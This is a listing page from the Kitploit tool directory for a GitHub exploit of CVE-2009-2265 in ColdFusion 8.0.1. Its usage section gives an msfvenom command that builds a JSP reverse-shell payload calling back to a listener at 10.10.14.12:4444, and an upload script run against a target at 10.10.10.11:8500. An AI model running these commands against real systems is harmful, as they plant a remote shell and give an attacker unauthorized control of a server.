Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2009-2265 — Exploit for CVE-2009-2265 targeting ColdFusion 8.0.1 with JSP reverse shell payload generation and automated upload. | Kitploit
Tools/GitHubGitHub/h3x0v3rl0rd/cve-2009-2265
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubh3x0v3rl0rd/cve-2009-2265

CVE-2009-2265

Exploit for CVE-2009-2265 targeting ColdFusion 8.0.1 with JSP reverse shell payload generation and automated upload.

View Repository
1361 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Version: ColdFusion 8.0.1

CVE-2009-2265

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.12 LPORT=4444 -f raw > shell.jsp

python upload.py 10.10.10.11 8500 shell.jsp

Example :

image

image

Download Tool